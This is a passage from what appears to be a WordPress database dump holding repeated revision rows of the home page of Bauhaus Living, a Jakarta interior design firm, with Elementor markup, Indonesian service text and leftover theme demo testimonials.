ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:58:13','2023-09-22 09:58:13','',22,'https://bauhaus.futuremediatrix.com/?p=4912',0,'revision','',0),(4913,3,'2023-09-22 09:58:13','2023-09-22 09:58:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:58:13','2023-09-22 09:58:13','',22,'https://bauhaus.futuremediatrix.com/?p=4913',0,'revision','',0),(4914,3,'2023-09-22 09:58:47','2023-09-22 09:58:47','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili 